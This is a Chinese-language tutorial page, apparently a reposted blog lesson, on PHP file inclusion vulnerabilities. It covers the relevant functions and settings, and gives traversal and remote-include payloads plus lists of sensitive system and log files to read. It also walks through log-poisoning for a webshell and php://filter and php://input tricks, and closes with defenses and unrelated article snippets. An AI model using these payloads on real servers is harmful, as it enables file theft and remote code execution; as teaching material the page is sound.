网络安全进阶学习第七课——文件包含漏洞

文章目录

  • 一、文件包含概念
  • 二、文件包含漏洞原理
  • 三、文件包含分类
    • 文件包含分为两种:
  • 四、与文件包含相关的配置文件:(php.ini文件)
  • 五、与文件包含有关的函数
    • 1、include()
    • 2、include_once()
    • 3、require()
    • 4、require_once()
  • 六、文件包含常见特征
    • 1、在某个URL或者某个参数里面出现如下特征都可以去尝试
    • 2、8009端口
    • 3、检测方法
  • 七、本地文件包含漏洞常被利用方法
    • 1、读取Windows系统敏感信息:
    • 2、读取linux系统敏感信息:
    • 3、文件包含可以配合图片马进行shell获取
    • 4、读取服务器日志和配置文件
  • 八、远程文件包含
  • 九、本地文件包含
  • 十、包含日志文件getshell
    • 利用前提:
    • 利用条件:
    • 具体步骤:
      • 1、构造url,访问web服务
      • 2、使用存在文件包含的php访问,进行包含错误日志
      • 3、写入webshell,构造url进行访问
    • 缺点:
  • 十一、伪协议
    • 1、file:// 可以用于访问本地文件系统
    • 2、php:// 访问各个输入/输出流
    • 3、php://filter
      • 用法:
    • 4、php://input
      • 举例:
  • 十二、文件包含漏洞防御


一、文件包含概念

开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无需再次编写,这种调用文件的过程一般被称为包含。

为了使代码更加灵活,通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。

服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。

举例:假如一个网站有一个栏目(头部导航栏)无论怎样切换,都不会变化的,那么这个网页就很大可能是存在文件包含。


二、文件包含漏洞原理

文件包含漏洞产生的原因是在通过PHP函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。

需要特别说明的是,服务器包含文件时,不管文件后缀是否是php,都会尝试当做php文件执行,如果文件内容确为规范的PHP代码,则会正常执行并返回结果,如果不是,则会原封不动地打印文件内容,所以文件包含漏洞常常会导致 任意文件读取与任意命令执行。


三、文件包含分类

文件包含分为两种:

  • 本地文件包含:包含本地主机上的文件(WEB服务器),文件名称是相对路径或者绝对路径;例如:192.168.1.111/include.php?url=./shell.txt

  • 远程文件包含:包含互联网上的文件,文件名称为URL格式;例如:192.168.1.111/include.php?url=http://10.10.10.111/shell.txt

而区分二者最简单的办法就是通过查看php.ini中是否开启了allow_ url_ include. 如果开启就有可能包含远程文件。


四、与文件包含相关的配置文件:(php.ini文件)

allow_url_fopen = on (默认开启) #允许打开URL文件,这个无论On或Off,本地文件包含都存在;

allow_url_include = on (默认关闭) #允许引用URL文件;


五、与文件包含有关的函数

1、include()

当使用该函数包含文件时,只有代码执行到include()函数是才将文件包含进来,发生错误时只给出一个警告,继续向下执行

2、include_once()

功能和include()相同,区别在于当重复调用同一文件时,程序只调用一次

3、require()

使用require函数包含文件时,只要程序一执行,立即调用脚本;如果前者执行发生错误,函数或输出错误信息,并终止脚本运行

4、require_once()

功能与require()相同,区别在于当重复调用同一文件时,程序只调用一次


六、文件包含常见特征

1、在某个URL或者某个参数里面出现如下特征都可以去尝试

  • ?page=a.php
  • ?home=b.html
  • ?file=content

2、8009端口

如果扫描IP发现开放了8009端口的,就可以尝试CVE20201938的Apache漏洞,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。

3、检测方法

?file=../../../../etc/passwd
?page=file:///etc/passwd
?home=main.cgi
?page=http://www.a.com/1.php
http://1.1.1.1/../../../../dir/file.txt

七、本地文件包含漏洞常被利用方法

1、读取Windows系统敏感信息:

C:\boot.ini									//查看系统版本
C:\windows\system32\inetsrv\MetaBase.xml	//IS配置文件
C:\windows\repair\sam 						//windows初次安装的密码
C:\program Files\mysq|\my.ini 				//Mysq|配置信息
C:\program Files\mysq|\data\mysq|\user.MYD 	//Mysql root
C:\windows\php.ini 							//php配置信息

2、读取linux系统敏感信息:

/etc/passwd 							//linux用户信息
/usr/local/app/apache2/conf/httpd.conf 	//apache2配置文件
/usr/local/app/php5/lib/php.ini 		//php配置文件
/etc/httpd/conf/httpd.conf 				//apache配置文件
/etc/my.cnf 							//Mysq|配置文件

3、文件包含可以配合图片马进行shell获取

4、读取服务器日志和配置文件

1、apache+Linux 日志默认路径
/etc/httpd/logs/access.log
/var/log/httpd/access.log2、apache+win2003 日志默认路径
D:\xampp\apache\logs\access.log
D:\xampp\apache\logs\error.log3、IIS6.0+win2003 默认日志文件
C:\WINDOWS\system32\Lognames4、IIS7.0+win2003 默认日志文件
%SystemDrive%\inetpub\logs\Lognames5、nginx 日志文件
/usr/local/nginx/logs6、apache+linux 默认配置文件
/etc/httpd/conf/httpd.conf
/etc/init.d/httpd 7、IIS6.0+win2003 配置文件
C:/Windows/system32/inetsrv/metabase.xml 8、IIS7.0+WIN 配置文件
C:\Windows\System32\inetsrv\config\applicationHost.config

八、远程文件包含

如果 php.ini 的配置选项 allow_url_include 和 allow_url_fopen 都开启的话,文件包含函数是可以加载远程文件的,这种漏洞被称为远程文件包含漏洞。利用远程文件包含漏洞,可以直接执行任意命令


九、本地文件包含

远程包含是可以用来执行命令的;那么本地文件包含怎么执行命令?
1、包含用户上传的文件;
2、如果没有发现上传点,可以包含日志文件getshell;
3、伪协议包含。


十、包含日志文件getshell

利用前提:

只能本地文件包含,知道日志的物理存放路径、存在文件包含漏洞

利用条件:

使用burp发送请求,或者curl工具(网页请求会对特殊字符编码)

具体步骤:

1、构造url,访问web服务

目的是,构成错误请求,apache就会将错误的请求写入,错误日志当中 error.log(Apache 一般是在Apache\logs目录下)
在这里插入图片描述
注意:假如是使用浏览器来输入错误请求,浏览器是会把“<”、“>”这两个符号进行URL编码后再存进错误日志的。

2、使用存在文件包含的php访问,进行包含错误日志

在这里插入图片描述

3、写入webshell,构造url进行访问

缺点:

若在日志中,存在一些<?php ?>的php脚本代码,但是语句构造错误无法正常执行,那么构造的正确代码也无法执行。简单说构造的第一个php语句正确,第二个错误,当使用文件包含时,就会报错。同时第一行代码也无法正常运行。


十一、伪协议

PHP 带有很多内置 URL 风格的封装协议,可用于类似 fopen()、 copy()、file_exists() 和 filesize() 的文件系统函数。

伪协议Value
file://访问本地文件系统
http://访问 HTTP(s) 网址
ftp://访问 FTP(s) URLs
php://访问各个输入/输出流(I/O streams)
zlib://压缩流
data://数据(RFC 2397)
glob://查找匹配的文件路径模式
phar://PHP 归档
ssh2://Secure Shell 2
rar://RAR
ogg://音频流
expect://处理交互式的流

除了这些封装协议,还能通过 stream_wrapper_register()来注册自定义的封装协议。

1、file:// 可以用于访问本地文件系统

不受allow_url_fopen与allow_ulr_include影响

使用方法:file://绝对路径

实例:file://C:\Windows\System32\drivers\etc\hosts #必须为绝对路径

2、php:// 访问各个输入/输出流

协议作用
php://input可以访问请求的原始数据的只读流,在POST请求中访问POST的data部分,在enctype=“multipart/form-data” 的时候php://input 是无效的。
php://output只写的数据流,允许以 print 和 echo 一样的方式写入到输出缓冲区。
php://fd(>=5.3.6)允许直接访问指定的文件描述符。例如 php://fd/3 引用了文件描述符 3。
php://memory、php://temp(>=5.1.0)一个类似文件包装器的数据流,允许读写临时数据。两者的唯一区别是 php://memory 总是把数据储存在内存中,而 php://temp 会在内存量达到预定义的限制后(默认是 2MB)存入临时文件中。临时文件位置的决定和 sys_get_temp_dir() 的方式一致。
php://filter(>=5.0.0)一种元封装器,设计用于数据流打开时的筛选过滤应用。对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、file() 和 file_get_contents(),在数据流内容读取之前没有机会应用其他过滤器。

php:// 用于访问各个输入/输出流(I/O streams),常用的是php://filterphp://input,php://filter用于读取源码,php://input用于执行php代码

3、php://filter

不受allow_url_fopen和allow_url_include影响

用于读取源码

参数详解

参数描述
resource=<要过滤的数据流>必须项。它指定了你要筛选过滤的数据流。
read=<读链的过滤器>该参数可选。可以设定一个或多个过滤器名称,以管道符(
write=<写链的筛选列表>该参数可选。可以设定一个或多个过滤器名称,以管道符(
<; 两个链的过滤器>任何没有以 read= 或 write= 作前缀的筛选器列表会视情况应用于读或写链。

可用的过滤器列表(4类)

字符串过滤器作用
string.rot13等同于str_rot13(),rot13变换
string.toupper等同于strtoupper(),转大写字母
string.tolower等同于strtolower(),转小写字母
string.strip_tags等同于strip_tags(),去除html、PHP语言标签
转换过滤器作用
convert.base64-encode & convert.base64-decode等同于base64_encode()和base64_decode(),base64编码解码
convert.quoted-printable-encode & convert.quoted-printable-decodequoted-printable 字符串与 8-bit 字符串编码解码
压缩过滤器作用
zlib.deflate & zlib.inflate在本地文件系统中创建 gzip 兼容文件的方法,但不产生命令行工具如 gzip的头和尾信息。只是压缩和解压数据流中的有效载荷部分。
bzip2.compress & bzip2.decompress同上,在本地文件系统中创建 bz2 兼容文件的方法。
加密过滤器作用
mcrypt.*libmcrypt 对称加密算法
mdecrypt.*libmcrypt 对称解密算法

用法:

  • 1)php://filter/read=convert.base64-encode/resource=[文件名]

  • 2)http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php
    在这里插入图片描述
    可以用获取页面源码,从而来进行代码审计

4、php://input

需开启allow_url_include

用于执行php代码,可以访问请求的原始数据的只读流,将post请求中的数据作为PHP代码执行。

将原本的include的文件流重定向到了用户可控制的输入流中

举例:

  • 1)在URL输入:127.0.0.1/upload/include.php/?page=php://input
  • 2)BP抓包
  • 3)然后BP重发送时,在下面附上你要执行的PHP代码。

注:当enctype=”multipart/form-data”时,php://input是无效的。


十二、文件包含漏洞防御

  • 1)allow_url_include和allow_url_fopen关闭;
  • 2)对用户包含的文件进行限制,如白名单、open_basedir;
  • 3)检查用户输入;
  • 4)检查变量是否初始化;
  • 5)关键的过滤在服务器端进行。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/9562.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

iTOP-STM32MP157开发板Linux Misc驱动-编译驱动程序

这里我们以 stm32mp157 开发板为例&#xff0c;将杂项设备驱动编译成模块&#xff0c;请参考本手册第三十七章 Linux 内核模块。我们将 misc.c 文件拷贝到 Ubuntu 的/home/nfs/03 目录下。将上次编译 helloworld 的 Makefile 文 件拷贝到 misc.c 同级目录下&#xff0c;修改 …

解决Unable to load authentication plugin ‘caching_sha2_password‘

连接Mysql8时报错&#xff1a; java.sql.SQLException: Unable to load authentication plugin caching_sha2_password.原因 不同版本的认证插件不同造成的 8版本前是&#xff1a;default_authentication_pluginmysql_native_password 8版本后是&#xff1a;default_authenti…

Postman抓包教程

目录 什么是抓包&#xff1f; 如何使用 Postman 进行抓包 查看历史抓包数据 使用抓包数据进行接口测试和开发 抓包技巧和注意事项 什么是抓包&#xff1f; 在计算机网络中&#xff0c;抓包是指捕获网络流量的过程。抓包工具可以截获进出计算机网络的数据流&#xff0c;并将…

Python numpy库的应用、matplotlib绘图、opencv的应用

numpy import numpy as npl1 [1, 2, 3, 4, 5]# array():将列表同构成一个numpy的数组 l2 np.array(l1) print(type(l2)) print(l2) # ndim : 返回数组的轴数&#xff08;维度数&#xff09; # shape&#xff1a;返回数组的形状&#xff0c;用元组表示&#xff1b;元组的元素…

SpringCloudAlibaba微服务实战系列(五)Sentinel1.8.5+Nacos持久化

Sentinel数据持久化 前面介绍Sentinel的流控、熔断降级等功能&#xff0c;同时Sentinel应用也在面临着一个问题&#xff1a;我们在Sentinel后台管理界面中配置了一堆流控、降级规则&#xff0c;但是Sentinel一重启&#xff0c;这些规则全部消失了。那么我们就要考虑Sentinel的持…

1、传统锁回顾(Jvm本地锁,MySQL悲观锁、乐观锁)

目录 1.1 从减库存聊起1.2 环境准备1.3 简单实现减库存1.4 演示超卖现象1.5 jvm锁1.6 三种情况导致Jvm本地锁失效1、多例模式下&#xff0c;Jvm本地锁失效2、Spring的事务导致Jvm本地锁失效3、集群部署导致Jvm本地锁失效 1.7 mysql锁演示1.7.1、一个sql1.7.2、悲观锁1.7.3、乐观…

深度学习:常用优化器Optimizer简介

深度学习&#xff1a;常用优化器Optimizer简介 随机梯度下降SGD带动量的随机梯度下降SGD-MomentumSGDWAdamAdamW 随机梯度下降SGD 梯度下降算法是使权重参数沿着整个训练集的梯度方向下降&#xff0c;但往往深度学习的训练集规模很大&#xff0c;计算整个训练集的梯度需要很大…

集睿致远推出CS5466多功能拓展坞方案:支持DP1.4、HDMI2.1视频8K输出

ASL新推出的 CS5466是一款Type-C/DP1.4转HDMI2.1的显示协议转换芯片,&#xff0c;它通过类型C/显示端口链路接收视频和音 频流&#xff0c;并转换为支持TMDS或FRL输出信令。DP接收器支持81.Gbp s链路速率。HDMI输出端口可以作为TMDS或FRL发射机工作。FRL发射机符合HDMI 2.1规范…

OpenCvSharp (C# OpenCV) 二维码畸变矫正--基于透视变换(附源码)

导读 本文主要介绍如何使用OpenCvSharp中的透视变换来实现二维码的畸变矫正。 由于CSDN文章中贴二维码会导致显示失败,大家可以直接点下面链接查看图片: C# OpenCV实现二维码畸变矫正--基于透视变换 (详细步骤 + 代码) 实现步骤 讲解实现步骤之前先看下效果(左边是原图,右边…

菜鸡shader:L13 渐隐渐显的UV动画

文章目录 SD部分Shader代码部分 呃呃&#xff0c;这是目前我学习庄懂AP01课程的最后一节了&#xff0c;我看了一下21集之后的内容是关于LightingMap&#xff0c;目前感觉还用不到&#xff0c;加上之前参与过一个项目里面也有用到LightingMap&#xff0c;也算了解过&#xff0c;…

拦截Bean使用之前各个时机的Spring组件

拦截Bean使用之前各个时机的Spring组件 之前使用过的BeanPostProcessor就是在Bean实例化之后&#xff0c;注入属性值之前的时机。 Spring Bean的生命周期本次演示的是在Bean实例化之前的时机&#xff0c;使用BeanFactoryPostProcessor进行验证&#xff0c;以及在加载Bean之前进…

NISP含金量?NISP真的有必要考么?NISP好考吗?NISP二级为什么那么贵?

NISP证书简述 NISP证书三个级别&#xff0c;分别是&#xff1a;一级、二级、三级&#xff08;专项&#xff09; 证书。其每一项资格证书都有不同的优点&#xff0c;但是优点各有 相同&#xff0c;而且拥有NISP二级证书可以免考更换CISP资格证书&#xff0c;那么证书含金量如何下…

rcu链表综合实践

基础知识 rcu-read copy update的缩写。和读写锁起到相同的效果。据说牛逼一点。对于我们普通程序员&#xff0c;要先学会使用&#xff0c;再探究其内部原理。 链表的数据结构&#xff1a; struct list_head {struct list_head *next, *prev; };还有一种&#xff1a;struct h…

STM32(HAL库)驱动st7789LCD屏幕(7引脚240*240)

目录 1、简介 2、CubeMX初始化配置 2.1 基础配置 2.1.1 SYS配置 2.1.2 RCC配置 2.2 屏幕引脚配置 2.3 项目生成 3、KEIL端程序整合 3.1 LCD驱动添加 3.2 函数修改 3.2.1 lcd.h修改 3.2.2 lcd_innit.h 修改 3.2.3 lcd.c修改 3.2.4 lcd_inut.c修改 3.3 主函数代码 3.3…

Django学习笔记-表单(forms)的使用

在Django中提供了了form表单&#xff0c;可以更为简单的创建表单模板信息&#xff0c;简化html的表单。 一、网页应用程序中表单的应用 表单通常用来作为提交数据时候使用。 1.1 创建表单模板文件夹 在项目文件夹下创建一个template文件夹&#xff0c;用于存储所有的html模…

使用百度地图SDK计算距离

说明&#xff1a;通过百度地图提供的SDK&#xff0c;可以计算出两个地点之间的距离&#xff0c;另外还有行驶路线等等。本文介绍如果使用百度地图SDK&#xff0c;并用java代码实现。 申请 首先需要登录百度地图的官网&#xff0c;申请开发者认证&#xff0c;个人认证一般都很…

GPT一键化身「AI助理」——自定义指令功能

最近GPT又更新了一个超实用的功能——自定义指令&#xff0c;启用后&#xff0c;你可以给GPT设置一些固定指令&#xff0c;让它记住或扮演某个角色&#xff0c;比如客服、律师、投资管理师、老师、营养师...... 这样&#xff0c;我们就不再需要每次都要打开新的聊天&#xff0c…

ChatGPT的工作原理:从输入到输出

&#x1f337;&#x1f341; 博主 libin9iOak带您 Go to New World.✨&#x1f341; &#x1f984; 个人主页——libin9iOak的博客&#x1f390; &#x1f433; 《面试题大全》 文章图文并茂&#x1f995;生动形象&#x1f996;简单易学&#xff01;欢迎大家来踩踩~&#x1f33…

华为eNSP:isis配置跨区域路由

一、拓扑图 二、路由器的配置 1、配置接口IP AR1: <Huawei>system-view [Huawei]int g0/0/0 [Huawei-GigabitEthernet0/0/0]ip add 1.1.1.1 24 [Huawei-GigabitEthernet0/0/0]q AR2: [Huawei]int g0/0/0 [Huawei-GigabitEthernet0/0/0]ip add 1.1.1.2 24 [Huawe…

【React Native】学习记录(一)——环境搭建

Expo是一套工具&#xff0c;库和服务&#xff0c;可让您通过编写JavaScript来构建原生iOS和Android应用程序。 一开始学习的时候直接使用的是expo。 npx create-expo-app my-appcd my-appnpm run start接下来需要搭建安卓和IOS端&#xff08;为此特意换成了苹果电脑&#xff09…